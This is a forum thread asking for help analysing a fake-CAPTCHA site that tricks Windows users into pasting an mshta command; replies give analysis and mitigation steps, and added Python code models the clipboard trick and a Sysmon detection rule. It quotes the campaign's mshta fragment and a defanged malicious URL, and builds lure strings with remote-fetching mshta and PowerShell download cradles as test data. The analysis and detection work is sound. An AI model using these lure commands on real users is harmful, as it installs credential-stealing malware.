Can anybody on Nostr do malware analysis in the wild?

This website shows a fake CAPTCHA only for Windows users. The CAPTCHA tricks the user into hitting Win + R and Ctrl + V to paste a seemingly innocent-looking verification ID into the Run console, which the website already copied to the user's clipboard upon visiting the site. It's easily missed that part of the pasted string is not visible and that it actually runs "mshta .icu/gkcxv.google?i=", which executes arbitrary code on the victim's machine.

The source code of the website has a heavily obfuscated script which seems to fetch and construct a payload that is eventually executed using eval() without any user input upon visiting the site. The site also seems to store some data to Ethereum smart contracts every few seconds for some reason.

I'm trying to figure out what the stage 2 mshta payload actually does and whether the site actually runs something with the mshta utility that can escape the browser sandbox. The payload is fetched from some very short-lived command & control servers, so it's hard to scrape the payload code directly. Does someone have the expertise to investigate this?

The *malicious* website:

https://gameskeys(.)net/we-were-here-forever-controls-guide

#asknostr nostr:nprofile1qqsyawyrzrttfmv4cmtx5w2m85702kdct7hv3amfrkhagpdf9cz46mgprpmhxue69uhkv6tvw3jhytnwdaehgu3wwa5kuef0qyghwumn8ghj7mn0wd68ytnhd9hx2tcpydmhxue69uhkv6tvw3jhytnwdaehgu3wwa5kuef08ankcmmzv9kr6ctvds20l3q3
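The clipboard trick described in the post, modelled in Python as an added example (this is not code from the post or from the site in question). The clipboard string, the host `example.invalid`, the path `verify.hta` and the "verification ID" are constructed placeholders, and `run_box_view` is a simplified assumption about the Win+R edit box: after Ctrl+V the caret sits at the end of the pasted text, so a narrow box shows only the tail, which is why the victim reads the decoy and never sees the `mshta` at the front.

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional, Tuple

# Constructed stand-in for the string a fake-CAPTCHA page writes to the
# clipboard. The host, path and "verification ID" are placeholders, not the
# infrastructure of the campaign discussed in the thread.
CONSTRUCTED_CLIPBOARD = (
    'mshta https://example.invalid/verify.hta '
    '# "I am not a robot - reCAPTCHA Verification ID: 7811"'
)

# Living-off-the-land binaries commonly placed in front of the decoy text.
LOLBINS = ("mshta", "powershell", "pwsh", "cmd", "curl", "msiexec",
           "rundll32", "regsvr32", "wscript", "cscript")

# A comment marker after the real command makes the decoy text inert:
# '#' and '::' are ignored by mshta/powershell, 'rem' by cmd.
COMMENT_SPLIT = re.compile(r"\s+(?:#|::|rem\b)", re.IGNORECASE)
URL = re.compile(r"""https?://[^\s"']+""", re.IGNORECASE)


@dataclass
class PastedCommand:
    binary: str              # executable the Run dialog will actually start
    argument: str            # everything after it, up to the decoy comment
    decoy: str               # the text the victim is meant to read
    urls: List[str] = field(default_factory=list)


def run_box_view(clipboard: str, box_width: int = 40) -> Tuple[str, str]:
    """Simplified model of the Win+R edit box after Ctrl+V (assumption: the
    caret lands at the end, so the box scrolls to show only the last
    `box_width` characters). Returns (visible_tail, hidden_head)."""
    if len(clipboard) <= box_width:
        return clipboard, ""
    return clipboard[-box_width:], clipboard[:-box_width]


def parse_pasted_command(clipboard: str) -> Optional[PastedCommand]:
    """Split a clipboard string into the command that runs and the decoy that
    is shown. Returns None when the first token is not a known LOLBin.
    (Paths containing spaces are not handled; this is an illustration.)"""
    text = clipboard.strip()
    head, _, rest = text.partition(" ")
    binary = head.strip('"').rsplit("\\", 1)[-1].lower()
    if binary.endswith(".exe"):
        binary = binary[:-4]
    if binary not in LOLBINS:
        return None
    parts = COMMENT_SPLIT.split(rest, maxsplit=1)
    argument = parts[0].strip()
    decoy = parts[1].strip().strip('"') if len(parts) > 1 else ""
    return PastedCommand(binary, argument, decoy, URL.findall(argument))


if __name__ == "__main__":
    visible, hidden = run_box_view(CONSTRUCTED_CLIPBOARD)
    print("victim sees :", repr(visible))
    print("hidden part :", repr(hidden))
    cmd = parse_pasted_command(CONSTRUCTED_CLIPBOARD)
    print("executes    :", cmd.binary, cmd.argument)
    print("fetches     :", cmd.urls)
```

Run as-is to see the split; the same `parse_pasted_command` can be pointed at whatever a suspect page actually puts on the clipboard (read it out of the page's `navigator.clipboard.writeText` / `copy`-event handler in the browser's devtools rather than pasting it anywhere).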


Discussion

Unfortunately, I don’t have much time to dive deeply into this right now, but off the top of my head, this looks like a sophisticated attack leveraging mshta(.)exe to execute malicious code outside the browser sandbox.

The fake CAPTCHA trick is clever, as it uses social engineering to get users to run a command that fetches a second-stage payload.

The obfuscated JavaScript on the site is constructing and executing the payload dynamically using eval(). The use of Ethereum smart contracts for storing or distributing C2 server addresses is particularly notable—there is a growing trend in malware campaigns to leverage blockchain technology for resilience, as blockchain-based infrastructure is much harder to disrupt.

To figure out what the stage 2 payload does, you’d need to:

1. Capture the payload: Use a network proxy or sandbox to intercept the HTTP request made by mshta(.)exe and retrieve the payload.

2. Deobfuscate the JavaScript: Tools like jsbeautifier can help reveal how the payload is constructed.

3. Analyze the payload: Static and dynamic analysis in a controlled environment should provide insight into its behavior.

Blocking mshta(.)exe via group policies is a good mitigation step if it’s not required in your environment. Again, I’m swamped at the moment, but I hope this helps as a starting point. Let me know what you find out.
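A detection that complements the mitigation in the reply above, as an added example in Python (not code from any participant in the thread). It runs a ClickFix-style rule over constructed Sysmon-like process-creation events: a LOLBin such as mshta or powershell started by explorer.exe (which is what a Win+R launch looks like), with a remote URL, a comment marker followed by decoy text, or CAPTCHA lure wording in its command line. The events, hosts (`example.invalid`) and user names are constructed; the field names follow Sysmon Event ID 1 (Image, CommandLine, ParentImage, User).

```python
import re
from typing import Dict, List, Tuple

# Constructed Sysmon-style process-creation events (not real telemetry).
# Only the fields the rule needs are included.
EVENTS: List[Dict[str, str]] = [
    {   # Win+R lure: explorer.exe starts mshta with a remote URL and decoy text
        "Image": r"C:\Windows\System32\mshta.exe",
        "CommandLine": 'mshta https://example.invalid/verify.hta '
                       '# "I am not a robot - reCAPTCHA Verification ID: 7811"',
        "ParentImage": r"C:\Windows\explorer.exe",
        "User": r"CORP\alice",
    },
    {   # benign: an installer runs a local .hta, no URL, no decoy
        "Image": r"C:\Windows\System32\mshta.exe",
        "CommandLine": r"mshta.exe C:\Vendor\setup.hta",
        "ParentImage": r"C:\Vendor\installer.exe",
        "User": r"CORP\bob",
    },
    {   # same lure, PowerShell download-cradle variant without a comment
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": 'powershell -w hidden -c "iex (irm https://example.invalid/s)"',
        "ParentImage": r"C:\Windows\explorer.exe",
        "User": r"CORP\carol",
    },
    {   # benign Run-dialog use
        "Image": r"C:\Windows\System32\notepad.exe",
        "CommandLine": "notepad.exe notes.txt",
        "ParentImage": r"C:\Windows\explorer.exe",
        "User": r"CORP\dave",
    },
]

LOLBINS = {"mshta.exe", "powershell.exe", "pwsh.exe", "cmd.exe", "curl.exe",
           "msiexec.exe", "rundll32.exe", "regsvr32.exe", "wscript.exe", "cscript.exe"}
URL = re.compile(r"""https?://[^\s"']+""", re.IGNORECASE)
DECOY_COMMENT = re.compile(r"\s(?:#|::|rem\b)\s", re.IGNORECASE)
LURE_WORDS = re.compile(r"\b(?:i am not a robot|captcha|verification id)\b", re.IGNORECASE)


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def clickfix_indicators(event: Dict[str, str]) -> List[str]:
    """Return the ClickFix traits present in one process-creation event."""
    hits: List[str] = []
    if basename(event["Image"]) not in LOLBINS:
        return hits
    cmd = event["CommandLine"]
    if basename(event["ParentImage"]) == "explorer.exe":
        hits.append("LOLBin started by explorer.exe (Run dialog / Win+R)")
    if URL.search(cmd):
        hits.append("remote URL in command line")
    if DECOY_COMMENT.search(cmd):
        hits.append("comment marker followed by decoy text")
    if LURE_WORDS.search(cmd):
        hits.append("CAPTCHA lure wording in command line")
    return hits


def triage(events: List[Dict[str, str]]) -> List[Tuple[str, str, List[str]]]:
    """Flag events with two or more indicators; a lone URL or a lone Run-dialog
    launch is too common on its own to alert on."""
    flagged = []
    for e in events:
        hits = clickfix_indicators(e)
        if len(hits) >= 2:
            flagged.append((e["User"], basename(e["Image"]), hits))
    return flagged


if __name__ == "__main__":
    for user, image, hits in triage(EVENTS):
        print(f"{user}: {image}")
        for h in hits:
            print("   -", h)
```

The Run dialog also keeps its own history in the registry under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU, so on a suspect host the full pasted string can usually be recovered from there even after the short-lived C2 is gone. Blocking mshta(.)exe with AppLocker or Software Restriction Policies, as suggested above, stops the first stage outright, while this kind of rule still catches the PowerShell and cmd variants of the same lure.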

Thanks a bunch, I didn't realize ETH smart contracts were used to distribute the C2 addresses 💡

UPDATE:

The malicious payload seems to be Lumma Stealer, which doesn't establish persistence on the victim's machine. It only affects Windows users.